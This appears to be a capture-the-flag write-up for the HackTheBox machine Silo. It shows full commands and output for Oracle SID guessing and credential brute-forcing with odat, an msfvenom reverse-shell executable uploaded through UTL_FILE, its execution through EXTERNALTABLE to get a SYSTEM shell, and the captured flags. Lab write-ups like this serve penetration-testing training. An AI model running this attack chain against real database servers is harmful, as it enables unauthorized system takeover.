HackTheBox Silo
Writeup for HackTheBox Silo
Machine Synopsis
Silo focuses mainly on leveraging Oracle to obtain a shell and escalate privileges. It was intended to be completed manually using various tools, however Oracle Database Attack Tool greatly simplifies the process, reducing the difficulty of the machine substantially. (Source)
Key exploitation techniques:
- Oracle TNS listener enumeration (SID guessing)
- Oracle account brute-forcing
- Oracle
UTL_FILEpackage abuse for file upload - Oracle
EXTERNALTABLEfor command execution - SYSTEM shell
Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
$ nmap -sC -sV -A -p- 10.10.10.82
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8080/tcp open http Oracle XML DB Enterprise Edition httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=XDB
|_http-title: 400 Bad Request
|_http-server-header: Oracle XML DB/Oracle Database
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49159/tcp open oracle-tns Oracle TNS listener (requires service name)
49160/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
49162/tcp open msrpc Microsoft Windows RPC
The scan identified IIS on port 80, SMB services, and crucially, an Oracle TNS listener on port 1521 and an Oracle XML DB HTTPD on port 8080.
A quick gobuster scan on port 80 yielded no interesting web content beyond /aspnet_client.
1
2
3
4
$ gobuster dir -u http://10.10.10.82 -w /usr/share/wordlists/dirb/common.txt -t 50
...
/aspnet_client (Status: 301) [Size: 156] [--> http://10.10.10.82/aspnet_client/]
...
The focus shifted to the Oracle services.
Exploitation
Oracle Enumeration & RCE (SYSTEM)
The Oracle Database Attack Tool (odat) was used to enumerate the Oracle TNS listener. First, sidguesser identified valid SIDs.
1
2
3
4
5
6
7
$ odat sidguesser -s 10.10.10.82
[1] (10.10.10.82:1521): Searching valid SIDs
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'XE' is a valid SID. Continue...
...
[+] SIDs found on the 10.10.10.82:1521 server: XE
The valid SID XE was found. Next, passwordguesser was used to brute-force credentials for this SID.
1
2
3
4
5
6
$ odat passwordguesser -s 10.10.10.82 -d XE
...
[+] Valid credentials found: scott/tiger. Continue...
...
[+] Accounts found on 10.10.10.82:1521/sid:XE:
scott/tiger
The credentials scott/tiger were successfully identified.
A Windows reverse shell executable (exploit.exe) was generated using msfvenom.
1
$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.6 LPORT=1234 -f exe > exploit.exe
odat’s utlfile module was then used to upload exploit.exe to the /temp directory on the remote server. Initial attempts failed due to insufficient privileges.
1
2
3
4
$ odat utlfile -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --putFile /temp exploit.exe /home/shiro/HackTheBox/Silo/exploit.exe
[1] (10.10.10.82:1521): Put the /home/shiro/HackTheBox/Silo/exploit.exe local file in the /temp folder like exploit.exe on the 10.10.10.82 server
[-] Impossible to put the /home/shiro/HackTheBox/Silo/exploit.exe file: `ORA-01031: insufficient privileges`
The --sysdba flag was added to odat to connect with SYSDBA privileges, which resolved the permission issue.
1
2
3
4
$ odat utlfile -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --putFile /temp exploit.exe /home/shiro/HackTheBox/Silo/exploit.exe --sysdba
[1] (10.10.10.82:1521): Put the /home/shiro/HackTheBox/Silo/exploit.exe local file in the /temp folder like exploit.exe on the 10.10.10.82 server
[+] The /home/shiro/HackTheBox/Silo/exploit.exe file was created on the /temp directory on the 10.10.10.82 server like the exploit.exe file
Finally, odat’s externaltable module was used to execute the uploaded exploit.exe. A netcat listener was set up to catch the shell.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
# On attacker, set up Netcat listener
$ nc -nlvp 1234
listening on [any] 1234 ...
# Execute the uploaded binary
$ odat externaltable -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --exec /temp exploit.exe --sysdba
[1] (10.10.10.82:1521): Execute the exploit.exe command stored in the /temp path
# Reverse shell received
connect to [10.10.16.6] from (UNKNOWN) [10.10.10.82] 49181
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>whoami
nt authority\system
This granted a reverse shell as NT AUTHORITY\SYSTEM. The user.txt and root.txt flags were retrieved.
1
2
3
4
5
6
C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>cd C:\Users
C:\Users>type C:\Users\Phineas\Desktop\user.txt
2b431674efbc61c40c4219ca7cd67e3e
C:\Users>type C:\Users\Administrator\Desktop\root.txt
d2df154a2b64a4810b71acdc8b24fd61